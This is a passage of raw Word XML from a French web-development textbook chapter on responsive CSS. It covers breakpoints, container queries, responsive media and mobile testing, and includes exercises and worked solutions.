      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Multiplier les points de rupture produit un CSS difficile à maintenir. Deux ou trois suffisent généralement ; au-delà, c'est souvent le signe qu'un composant devrait s'adapter seul.</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NE CIBLEZ PAS LES APPAREILS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@media (max-width: 375px)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> vise un iPhone précis, qui sera obsolète dans deux ans. Ciblez des comportements de mise en page : largeur disponible, orientation, préférences.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>21.4 Composants intrinsèquement adaptatifs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">De nombreux composants n'ont pas besoin de media query. Grid avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>auto-fit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>clamp()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour la typographie et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex-wrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suffisent à les rendre adaptatifs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un en-tête qui se replie sans media query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.entete {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: flex;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  flex-wrap: wrap;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  align-items: center;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-block: 1rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.entete__titre { flex: 1 1 16rem; font-size: clamp(1.5rem, 1rem + 2vw,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2.5rem); }</w:t>
        <w:br/>
        <w:t>.entete__actions { flex: 0 0 auto; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2413000"/>
            <wp:docPr id="32" name="Picture 32"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f30.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2413000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.30 — Deux philosophies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La container query pousse la logique plus loin : un composant s'adapte à la largeur de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>son conteneur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, et non de la fenêtre. C'est décisif pour une carte placée tantôt dans une colonne étroite, tantôt dans une zone large.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une carte qui s'adapte à son conteneur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.conteneur { container-type: inline-size; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>@container (min-width: 30rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte { display: grid; grid-template-columns: 8rem 1fr; gap: 1rem; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>21.5 Images et médias adaptatifs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une image doit rester nette et légère sur tous les écrans. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>srcset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>picture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (chapitre 6) couvrent les cas principaux ; le CSS complète avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>object-fit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et les ratios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des médias qui ne débordent jamais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.media {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  aspect-ratio: 16 / 9;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: 100%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  object-fit: cover;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 12px;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>video { max-width: 100%; height: auto; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>iframe { max-width: 100%; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aspect-ratio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplace les anciens conteneurs à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>padding-top: 56.25 %</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Il réserve l'espace, évite les sauts de mise en page et rend le code lisible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>21.6 Tester dans des conditions réelles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'émulation du navigateur est utile mais incomplète. Les différences de performance, de police et de densité d'écran ne s'y voient pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.68 — Six tests complémentaires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67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Test</w:t>
            </w:r>
          </w:p>
        </w:tc>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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="333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Ce qu'il révèle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2671"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Largeurs extrêmes</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Redimensionnement manuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3339"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Débordements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="267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Téléphone réel</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Appareil physique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="333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Polices, densité, performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2671"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Zoom 200 %</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Navigateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3339"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lisibilité, débordements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="267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Réseau lent</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Émulation 3G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="333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Ordre de chargement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2671"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Orientation</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Rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3339"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hauteurs dynamiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="267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Mode sombre</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Préférence système</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="333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Contrastes, images</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Choisir la bonne unité de hauteur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Attention aux unités de hauteur sur mobile */</w:t>
        <w:br/>
        <w:t>.hero {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  min-height: 100svh;   /* small viewport : barre d'URL visible */</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.panneau {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  max-height: 100dvh;   /* dynamic viewport : s'adapte aux barres */</w:t>
        <w:br/>
        <w:t>}</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LE TEST DES 320 PIXELS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Réduisez la fenêtre à 320 pixels de large et parcourez toute la page. Aucun contenu ne doit être tronqué, aucun défilement horizontal ne doit apparaître. C'est le test le plus révélateur, et le plus rapide.</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responsive adapte la mise en page à l'espace, pas à un appareil.</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Mobile-first signifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et styles enrichis progressivement.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points de rupture se choisissent là où le contenu casse.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Deux ou trois points de rupture suffisent souvent.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Grid, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>clamp()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex-wrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rendent des composants adaptatifs sans media query.</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container queries adaptent un composant à son conteneur.</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test à 320 pixels révèle la majorité des problèmes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La mise en page s'adapte. Le chapitre suivant précise les unités fluides et les techniques de composition entre deux tailles d'écran.</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21.1 — Convertir une page en mobile-first</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Cette feuille est écrite en desktop-first. Réécrivez-la en mobile-first.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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@media (max-width: 768px) { .grille { grid-template-columns: 1fr; } }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.grille { grid-template-columns: repeat(3, 1fr); }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.titre { font-size: 42px; }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> puis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@media (max-width: 768px) { .titre { font-size: 28px; } }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 21.2 — Carte adaptative avec container query</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Une carte doit s'afficher en colonne dans un espace étroit et en deux colonnes dans un espace large, quel que soit l'écran.</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Déclarez un conteneur.</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Ajoutez la container query.</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Testez en plaçant la carte dans deux zones de largeurs différentes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 21.3 — Auditer une page sur mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   AUDIT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Testez une page réelle à 320 pixels, en zoom 200 % et en réseau lent.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Notez trois défauts.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Corrigez-les.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qu'aucun défilement horizontal ne subsiste.</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21.1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.grille { display: grid; gap: 1rem; grid-template-columns: 1fr; }</w:t>
        <w:br/>
        <w:t>.titre { font-size: clamp(1.75rem, 1.2rem + 2.5vw, 2.625rem); }</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (min-width: 48rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .grille { grid-template-columns: repeat(3, minmax(0, 1fr)); }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le mobile-first commence par une colonne unique ; la media query ajoute les colonnes à partir d'une largeur suffisante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>clamp()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplace la double déclaration de taille de titre : une seule ligne, un rendu continu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 21.2</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.zone { container-type: inline-size; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>.carte { display: grid; gap: .75rem; }</w:t>
        <w:br/>
        <w:t>.carte__image { width: 100%; aspect-ratio: 16/9; object-fit: cover; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>@container (min-width: 26rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte { grid-template-columns: 9rem 1fr; align-items: start; }</w:t>
        <w:br/>
